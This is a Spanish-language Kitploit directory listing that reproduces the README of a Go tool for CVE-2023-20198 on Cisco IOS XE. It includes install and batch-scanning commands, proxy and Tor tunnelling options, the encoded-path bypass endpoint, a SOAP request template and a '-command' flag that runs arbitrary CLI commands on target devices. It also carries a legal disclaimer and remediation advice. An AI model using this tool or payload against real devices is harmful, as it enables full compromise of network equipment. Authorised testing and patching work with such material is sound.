Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cisco-cve-2023-20198-checker — Escáner de vulnerabilidades basado en Go para detectar CVE-2023-20198 en dispositivos Cisco IOS XE. Prueba interfaces SOAP/XML (WSMA) para ejecución remota de código con escaneo por lotes y generación de informes HTML. | Kitploit
Herramientas/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de RedesPruebas de PenetraciónComando y Control
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Escáner de vulnerabilidades basado en Go para detectar CVE-2023-20198 en dispositivos Cisco IOS XE. Prueba interfaces SOAP/XML (WSMA) para ejecución remota de código con escaneo por lotes y generación de informes HTML.

Ver Repositorio
10hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Comprobador de Cisco CVE-2023-20198

Go Version License Platform

Un escáner de vulnerabilidades profesional para detectar CVE-2023-20198 en dispositivos Cisco IOS XE. Prueba interfaces SOAP/XML vulnerables (WSMA). Diseñado para evaluaciones de seguridad autorizadas y auditoría de redes.

⚠️ Aviso Legal

SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta está destinada exclusivamente a:

  • Escaneo de vulnerabilidades autorizado
  • Auditorías de seguridad con consentimiento explícito por escrito
  • Evaluaciones de seguridad de redes
  • Fines educativos en entornos de laboratorio controlados
  • Pruebas de cumplimiento y penetración

El acceso no autorizado a sistemas informáticos es ILEGAL. Asegúrate siempre de tener la autorización adecuada antes de probar cualquier sistema.


🚀 Inicio Rápido

Instalación

Usando go install (Recomendado)

go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

El binario se instalará en tu directorio $GOPATH/bin (normalmente ~/go/bin).

Instalación Manual

# Clone repository
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Build
go build -o cisco-cve-2023-20198-checker

# Install (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Uso Básico

# Check single target
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Check multiple targets
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Generate HTML report
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Características

  • ✅ Detección de vulnerabilidades - Prueba CVE-2023-20198 (RCE en WSMA)
  • ✅ Escaneo de objetivos individuales y por lotes
  • ✅ Soporte de puertos personalizados (por defecto: 443)
  • ✅ Ejecución de comandos vía SOAP/XML
  • ✅ Generación de informes HTML profesionales
  • ✅ Cero dependencias externas
  • ✅ Multiplataforma (Linux, macOS, Windows)
  • ✅ Opción para omitir certificados SSL/TLS
  • ✅ Tiempos de espera configurables
  • ✅ Soporte de proxy (HTTP, HTTPS, SOCKS5)
  • ✅ Proxies autenticados
  • ✅ Soporte de variables de entorno (HTTP_PROXY, HTTPS_PROXY)

🌐 Soporte de Proxy

¡Perfecto para entornos corporativos! Compatible con:

  • Proxies HTTP/HTTPS
  • Proxies SOCKS5 (túneles SSH, Tor)
  • Proxies autenticados
  • Variables de entorno
# HTTP Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Environment variable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Consulta PROXY_GUIDE.md para obtener una configuración detallada del proxy.


💻 Opciones de Línea de Comandos

OpciónTipoPor defectoDescripción
-targetstring-IP/hostname de un único objetivo
-targets-filestring-Archivo con los objetivos (uno por línea)
-portint443Puerto HTTPS/SOAP
-usernamestringadminUsuario SOAP
-passwordstring-Requerido. Contraseña SOAP
-commandstringuname -aComando a ejecutar
-htmlboolfalseGenerar informe HTML
-timeoutint10Tiempo de espera de la solicitud (segundos)
-skip-verifybooltrueOmitir verificación SSL
-proxystring-URL del proxy (http://, https://, socks5://)

📖 Ejemplos de Uso

Prueba de un Solo Objetivo

# Basic vulnerability check
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Custom port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Execute specific command
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Generate report
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Pruebas por Lotes

# Create targets file
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Test all targets
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Batch with HTML report
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Comandos Avanzados

# Network enumeration
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Version detection
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Through HTTP proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Through SOCKS5 proxy (SSH tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Authenticated proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 Acerca de CVE-2023-20198

Detalles de la Vulnerabilidad

CVE ID: CVE-2023-20198
Puntuación CVSS: 10.0 (Crítica)
Tipo: Ejecución Remota de Código (RCE)
Afecta: Interfaz Web de Cisco IOS XE (WSMA)

Detalles Técnicos

  • Endpoint: /%2577ebui_wsma_https (bypass de codificación de ruta)
  • Protocolo: SOAP 1.1 sobre HTTPS
  • Autenticación: WS-Security UsernameToken (se requieren credenciales válidas)
  • Namespace: urn:cisco:wsma-exec
  • Impacto: Compromiso total del dispositivo con credenciales válidas

Estructura de la Solicitud SOAP

<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Remediación

Para Administradores de Sistemas

Si tus dispositivos son vulnerables:

1. Deshabilitar WSMA (si no es necesario)

no ip http server
no ip http secure-server

2. Restringir el acceso con ACL

ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Actualizar el firmware - Aplicar los últimos parches de seguridad de Cisco

4. Habilitar autenticación sólida

aaa new-model
aaa authentication login default group tacacs+ local

5. Supervisar los registros - Vigilar actividad sospechosa de SOAP/HTTP


🏗️ Compilación desde el Código Fuente

Requisitos Previos

  • Go 1.21 o superior

Compilar

# Standard build
go build -o cisco-cve-2023-20198-checker

# Optimized (smaller binary)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Cross-compile for different platforms
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Ejemplos de Salida

Descargar herramienta